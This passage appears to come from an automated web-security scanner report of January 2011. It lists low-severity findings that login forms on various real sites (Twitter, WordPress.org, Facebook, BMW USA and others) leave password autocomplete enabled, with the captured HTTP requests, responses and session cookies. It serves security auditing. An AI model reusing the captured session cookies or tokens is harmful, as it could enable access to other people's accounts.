User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:25 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964085-20547-5536
ETag: "85433ba8bcb16420f3ea185c5d7c6195"
Last-Modified: Tue, 25 Jan 2011 14:01:25 GMT
X-Runtime: 0.01379
Content-Type: text/html; charset=utf-8
Content-Length: 52371
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964083613063; path=/; expires=Tue, 01-Feb-11 14:01:23 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596408557745250; path=/; expires=Thu, 24 Feb 2011 14:01:25 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTYxMDFiNjg3MGUwYWZiNDYxNDkyZGM1NTZiMTIxZGJjIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsISp16vS0B--e1e310d0e3c9c2bde665bf97fbd81a7490ab10e3; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="80a68a305b494d297851ede1b58edcfa731b5d48" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

15.94. http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu

Summary

Severity:   Low
Confidence:   Certain
Host:   http://venedet.michnica.net
Path:   /index.php/joomla/1-joomla-16-je-tu

Issue detail

The page contains a form with the following action URL:
  • http://venedet.michnica.net/index.php/component/comprofiler/login
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /index.php/joomla/1-joomla-16-je-tu HTTP/1.1
Host: venedet.michnica.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:41 GMT
Server: Apache
Vary: Host,Accept-Encoding
Set-Cookie: fa5a1b42d3949309610b52593e36fa6f=1841b8d77a50e80e7a37fed80c5175b4; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17676


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sk-sk" lang="sk-sk" dir=
...[SNIP]...
</h3>
<form action="http://venedet.michnica.net/index.php/component/comprofiler/login" method="post" id="mod_loginform" style="margin:0px;">
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="mod_login">
...[SNIP]...
<span><input type="password" name="passwd" id="mod_login_password" class="inputbox" size="14" /></span>
...[SNIP]...

15.95. http://wordpress.org/extend/plugins/tweetmeme-follow-button/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://wordpress.org
Path:   /extend/plugins/tweetmeme-follow-button/

Issue detail

The page contains a form with the following action URL:
  • http://wordpress.org/extend/plugins/bb-login.php
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /extend/plugins/tweetmeme-follow-button/ HTTP/1.1
Host: wordpress.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 25 Jan 2011 14:03:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 20241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profil
...[SNIP]...
</h2>
       
       <form class="login" method="post" action="http://wordpress.org/extend/plugins/bb-login.php">
<p>
...[SNIP]...
<label>Password        <input class="text" name="password" type="password" id="password" size="13" maxlength="40" />
   </label>
...[SNIP]...

15.96. http://wordpress.org/extend/plugins/tweetmeme/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://wordpress.org
Path:   /extend/plugins/tweetmeme/

Issue detail

The page contains a form with the following action URL:
  • http://wordpress.org/extend/plugins/bb-login.php
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /extend/plugins/tweetmeme/ HTTP/1.1
Host: wordpress.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 25 Jan 2011 14:03:11 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 23579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profil
...[SNIP]...
</h2>
       
       <form class="login" method="post" action="http://wordpress.org/extend/plugins/bb-login.php">
<p>
...[SNIP]...
<label>Password        <input class="text" name="password" type="password" id="password" size="13" maxlength="40" />
   </label>
...[SNIP]...

15.97. http://wordpress.org/extend/plugins/wp-pagenavi/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://wordpress.org
Path:   /extend/plugins/wp-pagenavi/

Issue detail

The page contains a form with the following action URL:
  • http://wordpress.org/extend/plugins/bb-login.php
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /extend/plugins/wp-pagenavi/ HTTP/1.1
Host: wordpress.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 24 Jan 2011 23:11:13 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 23604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profil
...[SNIP]...
</h2>
       
       <form class="login" method="post" action="http://wordpress.org/extend/plugins/bb-login.php">
<p>
...[SNIP]...
<label>Password        <input class="text" name="password" type="password" id="password" size="13" maxlength="40" />
   </label>
...[SNIP]...

15.98. http://www.adside.com/adside/advertiser.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adside.com
Path:   /adside/advertiser.html

Issue detail

The page contains a form with the following action URL:
  • http://www.adside.com/adside/advertiser.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /adside/advertiser.html HTTP/1.1
Host: www.adside.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:23 GMT
ETag: W/"14556-1295025731000"
Last-Modified: Fri, 14 Jan 2011 17:22:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 14556
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>AdSide: Beyond St
...[SNIP]...
</div>
       <form method="post" action="" id="login" name="login">
           <input type="image" src="/img/button_signin.gif" id="signIn" name="signIn" value="Sign In" />
...[SNIP]...
</label><input type="password" name="password" id="password" tabindex="1" /></div>
...[SNIP]...

15.99. http://www.adside.com/adside/publisher.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adside.com
Path:   /adside/publisher.html

Issue detail

The page contains a form with the following action URL:
  • http://www.adside.com/adside/publisher.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /adside/publisher.html HTTP/1.1
Host: www.adside.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:22 GMT
ETag: W/"8990-1295025731000"
Last-Modified: Fri, 14 Jan 2011 17:22:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 8990
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>AdSide: Beyond St
...[SNIP]...
</div>
       <form method="post" action="" id="login" name="login">
           <input type="image" src="/img/button_signin.gif" id="signIn" name="signIn" value="Sign In" />
...[SNIP]...
</label><input type="password" name="password" id="password" tabindex="1" /></div>
...[SNIP]...

15.100. http://www.americascupmedia.com/index.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.americascupmedia.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL:
  • http://www.americascupmedia.com/index.php
The form contains the following password field with autocomplete enabled:
  • psw

Request

GET /index.php HTTP/1.1
Host: www.americascupmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:06:26 GMT
Server: Apache
Set-Cookie: PHPSESSID=69ffa747e74ec3fc598608ba70c8ece5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 63617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media</
...[SNIP]...
<td colspan='2' class='typo_login' align='center'>
<form name='identification' action='' method='get' enctype="multipart/form-data"><div id='tab_identite' style='display:none; '>
...[SNIP]...
<input name="login" id='login' type="text" class="form" >
psw&nbsp;<input name="psw" id='psw' type="password" class="form" >
<input type="button" class="form" value="ok"    name="submit" id='validezlogin' rel='The "Email" field is not adequately filled'>
...[SNIP]...

15.101. http://www.barkerstores.com/soundings/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.barkerstores.com
Path:   /soundings/

Issue detail

The page contains a form with the following action URL:
  • http://www.barkerstores.com/soundings/Default.aspx
The form contains the following password field with autocomplete enabled:
  • _ctl2:login:txtPassword

Request

GET /soundings/ HTTP/1.1
Host: www.barkerstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 14:24:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=etd10v55qnlha3bgxe4zk255; path=/
Set-Cookie: chk_support=check; path=/
Set-Cookie: SOU_CustID=SOU13989; path=/
Set-Cookie: SOU_CartID=SOU-9E35923E-12511; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26388


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>Soundings Online Catalog</title>
       <meta name="GENERATOR" content="Microsoft Visual Studio.NET 7.0">
       <me
...[SNIP]...
<body>
       <form name="Form1" method="post" action="Default.aspx" id="Form1">
<input type="hidden" name="__EVENTTARGET" value="" />
...[SNIP]...
<BR>
                                       <input name="_ctl2:login:txtPassword" type="password" id="_ctl2_login_txtPassword" class="txBox" style="width:85px;" />
                                       </TD>
...[SNIP]...

15.102. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /Secured/Content/Forms/Login.aspx

Issue detail

The page contains a form with the following action URL:
  • https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
The form contains the following password fields with autocomplete enabled:
  • ctl00$ctl00$ctl00$MasterContent$SideNavContent$tbPassword
  • ctl00$ctl00$ctl00$MasterContent$SideNavContent$tbMFAnswer

Request

GET /Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=PC#1295637745501-300919.17#1296864738|check#true#1295655198|session#1295655081531-668160#1295656998; ASP.NET_SessionId=hwiose4551oubw55xmxold55; WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; NSC_CNX_21529_64.29.204.16=4f52b4193661

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Pragma: no-cache
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 15:19:16 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:16 GMT;path=/
Content-Length: 212255


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
<body id="ctl00_ctl00_ctl00_BodyTag">
<form name="aspnetForm" method="post" action="/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm" onreset="if (window.setTimeout) window.setTimeout('VAM_OnReset(false);', 100);">
<div>
...[SNIP]...
<div class="signInInput">
                            <input name="ctl00$ctl00$ctl00$MasterContent$SideNavContent$tbPassword" type="password" maxlength="32" id="ctl00_ctl00_ctl00_MasterContent_SideNavContent_tbPassword" class="regTextBox" style="width:200px;" />
                           
                        </div>
...[SNIP]...
<td valign="middle">
                                               <input name="ctl00$ctl00$ctl00$MasterContent$SideNavContent$tbMFAnswer" type="password" maxlength="50" id="ctl00_ctl00_ctl00_MasterContent_SideNavContent_tbMFAnswer" onkeypress="return(VAM_KeyPress(this, event))" onkeydown="return(VAM_OnKeyDown(this, event))" style="width:182px;" />
                                           </td>
...[SNIP]...

15.103. http://www.cloudaccess.net/client-login.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /client-login.html

Issue detail

The page contains a form with the following action URL:
  • https://billing.cloudaccess.net/jwhmcs.php?task=ulogin
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /client-login.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:45 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
Last-Modified: Tue, 30 Nov 2010 21:35:24 GMT
Expires: Mon, 24 Jan 2011 14:07:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...
<div id="myCloudPanelForm"><form id="form-login" name="login" method="post" action="https://billing.cloudaccess.net/jwhmcs.php?task=ulogin"> <fieldset class="input">
...[SNIP]...
<br /> <input alt="password" size="18" class="inputbox" name="password" id="modlgn_passwd" type="password" /></p>
...[SNIP]...

15.104. http://www.dedipower.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dedipower.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • https://portal.dedipower.com/
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET / HTTP/1.1
Host: www.dedipower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:12:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: symfony=6hvnhit5lq2d9qcjo8guti4nu0; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</h6>
<form action="https://portal.dedipower.com" method="post">

<p>
...[SNIP]...
<br />
<input type="password" name="pass" /></p>
...[SNIP]...

15.105. http://www.dynamicdrive.com/forums/showthread.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dynamicdrive.com
Path:   /forums/showthread.php

Issue detail

The page contains a form with the following action URL:
  • http://www.dynamicdrive.com/forums/login.php?do=login
The form contains the following password field with autocomplete enabled:
  • vb_login_password

Request

GET /forums/showthread.php HTTP/1.1
Host: www.dynamicdrive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:59:15 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: bbsessionhash=e29c1b7649b3da1e43c63d31de4eefad; path=/; HttpOnly
Set-Cookie: bblastvisit=1295913555; expires=Tue, 24-Jan-2012 23:59:15 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Tue, 24-Jan-2012 23:59:15 GMT; path=/
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 25157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<met
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=381">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

15.106. http://www.eraser.ee/uudised/joomla/329-joomla-16-on-saabunud.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eraser.ee
Path:   /uudised/joomla/329-joomla-16-on-saabunud.html

Issue detail

The page contains a form with the following action URL:
  • http://www.eraser.ee/uudised/joomla.html
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /uudised/joomla/329-joomla-16-on-saabunud.html HTTP/1.1
Host: www.eraser.ee
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f2fa25d95fd31dc38873e1bc08d1d659=da81efe2eb9fa0e02e77a8fa6697e953; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-presets=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-backgroundlevel=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-bodylevel=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-cssstyle=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-linkcolor=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-font-family=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-font-size-is=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 16:04:57 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="et-ee" lang="et-ee" >
<he
...[SNIP]...
<div class="main-login-form">
<form action="/uudised/joomla.html" method="post" name="login" id="form-login" >
<h4>
...[SNIP]...
<br />
<input name="passwd" id="mod_login_password" type="password" class="inputbox png" value="Parool" alt="Parool" onblur="if(this.value=='') this.value='Parool';" onfocus="if(this.value=='Parool') this.value='';" size="26" alt="password" />
</div>
...[SNIP]...

15.107. http://www.facebook.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://www.facebook.com/
The form contains the following password field with autocomplete enabled:
  • reg_passwd__

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=fYoRD; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:15:00 GMT
Content-Length: 30560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="912130b43b3ba6a45553142d27ed4396" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

15.108. http://www.facebook.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • https://login.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=fYoRD; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:15:00 GMT
Content-Length: 30560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
